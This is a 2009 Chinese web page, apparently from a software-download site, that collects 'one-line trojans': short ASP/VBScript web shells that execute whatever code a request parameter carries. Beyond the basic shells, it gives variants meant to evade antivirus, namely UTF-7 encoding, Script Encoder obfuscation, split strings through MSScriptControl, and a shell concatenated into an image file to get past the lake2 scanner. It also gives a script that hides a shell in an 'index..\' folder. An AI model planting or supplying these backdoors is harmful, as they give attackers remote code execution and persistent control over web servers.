一句话木马的部分整理pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范一句话木马的部分整理

一句话木马的部分整理


2009/8/16  编辑:佚名 来源:本站整理  关键词:

一句话木马的部分整理

 

<%execute request("#")%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>

<%ExecuteGlobal request(chr(35))%>

<%eval request("#")%>

上面都是正常的SHELL, 下面几个是变形, 或者是用来免杀的

数据信息库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

用include包含一个图片PHOTO,图片PHOTO最好是可以通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的
要绕过lake2的话, 用几个变量加常量的方法定义图片PHOTO名再包含就可以能够了


<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

另外还一个另类的, 利用windows的目录漏洞,建立..\目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"\index..\")
Set a = fso.CreateTextFile(path&"\index..\1.asp", True)
a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine"</script>"

一句话的木马并不只是有这些.脚本语言中大多数和系统system交互的函数都能够用来作为后门.安全性和可用性是不可逆的

相关文章
  • 王者荣耀队友一句话感动玩家 这样队友我能上王者
  • 话题:炉石里你最喜欢的台词是哪一句?
  • 地球之外飞来神秘金属球,宇宙学家的一句话让NASA下达封口令
  • 中国13岁少年靠什么成功加盟皇马?他爸爸一句话揭开谜底
  • 一句话木马的部分整理
  • 只需要一句即可突破防下载数据库
  • ASPX一句话木马--终极版&详细分析
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图